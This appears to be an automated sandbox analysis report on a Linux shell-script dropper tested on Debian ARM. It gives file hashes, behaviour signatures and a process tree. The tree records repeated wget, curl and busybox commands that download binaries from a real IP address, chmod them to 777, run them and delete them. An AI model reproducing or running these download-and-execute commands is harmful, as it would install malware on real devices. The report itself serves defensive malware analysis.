Analysis
-
max time kernel
67s -
max time network
72s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/10/2024, 01:34
Static task
static1
Behavioral task
behavioral1
Sample
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
-
Size
10KB
-
MD5
87159c208c4802b4a091c9afdab0a149
-
SHA1
4a431fedf0d52d9e6f66216d506e9c9c8b992f5c
-
SHA256
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089
-
SHA512
753de5440287c2ca57ed60036c9e630dd86b64c1175e48f95bd64e1d646ed12a86163212d2be91e9c5dd44a440717dd41c11a8fdfd89991d74ba2ff9ac324cf0
-
SSDEEP
192:ETiaS/TRw4sFgAuWD+y+TiaS/TK4sFgAyG:ETiaS/TR9WDv+TiaS/TU
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 706 chmod 798 chmod 836 chmod 866 chmod 898 chmod 910 chmod 924 chmod 712 chmod 904 chmod 930 chmod 854 chmod 936 chmod 727 chmod 743 chmod 769 chmod 789 chmod 886 chmod 892 chmod 918 chmod 948 chmod 860 chmod 872 chmod 942 chmod 816 chmod 695 chmod 782 chmod 848 chmod 878 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl 696 xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl /tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb 707 CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb /tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH 713 M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH /tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI 729 JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI /tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q 745 c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q /tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv 771 bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv /tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K 783 eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K /tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B 790 VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B /tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg 800 J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg /tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 818 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 /tmp/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn 838 uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn /tmp/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr 849 76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr /tmp/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC 855 EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC /tmp/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf 861 3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf /tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg 867 J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg /tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 873 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 /tmp/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn 879 uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn /tmp/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr 887 76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr /tmp/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC 893 EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC /tmp/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf 899 3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf /tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q 905 c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q /tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl 911 xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl /tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb 919 CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb /tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH 925 M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH /tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI 931 JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI /tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv 937 bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv /tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K 943 eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K /tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B 949 VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B -
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q curl File opened for modification /tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B curl File opened for modification /tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B curl File opened for modification /tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg curl File opened for modification /tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 curl File opened for modification /tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K curl File opened for modification /tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 curl File opened for modification /tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH curl File opened for modification /tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl curl File opened for modification /tmp/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC curl File opened for modification /tmp/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf curl File opened for modification /tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg curl File opened for modification /tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q curl File opened for modification /tmp/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn curl File opened for modification /tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH curl File opened for modification /tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI curl File opened for modification /tmp/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn curl File opened for modification /tmp/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr curl File opened for modification /tmp/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr curl File opened for modification /tmp/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC curl File opened for modification /tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb curl File opened for modification /tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv curl File opened for modification /tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv curl File opened for modification /tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl curl File opened for modification /tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb curl File opened for modification /tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K curl File opened for modification /tmp/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf curl File opened for modification /tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI curl
Processes
-
/tmp/344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh/tmp/344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh1⤵PID:666
-
/bin/rm/bin/rm bins.sh2⤵PID:675
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵PID:677
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:685
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵PID:693
-
-
/bin/chmodchmod 777 xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- File and Directory Permissions Modification
PID:695
-
-
/tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl./xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- Executes dropped EXE
PID:696
-
-
/bin/rmrm xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵PID:698
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵PID:699
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:703
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵PID:705
-
-
/bin/chmodchmod 777 CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- File and Directory Permissions Modification
PID:706
-
-
/tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb./CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- Executes dropped EXE
PID:707
-
-
/bin/rmrm CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵PID:708
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵PID:709
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:710
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵PID:711
-
-
/bin/chmodchmod 777 M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- File and Directory Permissions Modification
PID:712
-
-
/tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH./M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- Executes dropped EXE
PID:713
-
-
/bin/rmrm M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵PID:714
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵PID:716
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:720
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵PID:725
-
-
/bin/chmodchmod 777 JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI./JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- Executes dropped EXE
PID:729
-
-
/bin/rmrm JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵PID:730
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵PID:731
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵PID:739
-
-
/bin/chmodchmod 777 c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q./c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵PID:746
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵PID:762
-
-
/bin/chmodchmod 777 bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv./bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- Executes dropped EXE
PID:771
-
-
/bin/rmrm bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵PID:772
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵PID:773
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:776
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵PID:781
-
-
/bin/chmodchmod 777 eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- File and Directory Permissions Modification
PID:782
-
-
/tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K./eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- Executes dropped EXE
PID:783
-
-
/bin/rmrm eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵PID:784
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵PID:786
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:787
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵PID:788
-
-
/bin/chmodchmod 777 VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B./VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- Executes dropped EXE
PID:790
-
-
/bin/rmrm VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵PID:791
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵PID:792
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:793
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵PID:796
-
-
/bin/chmodchmod 777 J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg./J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵PID:801
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵PID:805
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵PID:813
-
-
/bin/chmodchmod 777 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83./8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵PID:819
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵PID:821
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵PID:834
-
-
/bin/chmodchmod 777 uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn./uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵PID:839
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵PID:841
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵PID:847
-
-
/bin/chmodchmod 777 76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr./76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm 76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵PID:850
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵PID:851
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:852
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵PID:853
-
-
/bin/chmodchmod 777 EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC./EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵PID:856
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵PID:857
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵PID:859
-
-
/bin/chmodchmod 777 3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf./3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm 3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵PID:862
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵PID:863
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵PID:865
-
-
/bin/chmodchmod 777 J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg./J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵PID:868
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵PID:869
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵PID:871
-
-
/bin/chmodchmod 777 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83./8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵PID:877
-
-
/bin/chmodchmod 777 uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn./uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵PID:880
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵PID:885
-
-
/bin/chmodchmod 777 76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr./76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm 76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵PID:888
-
-
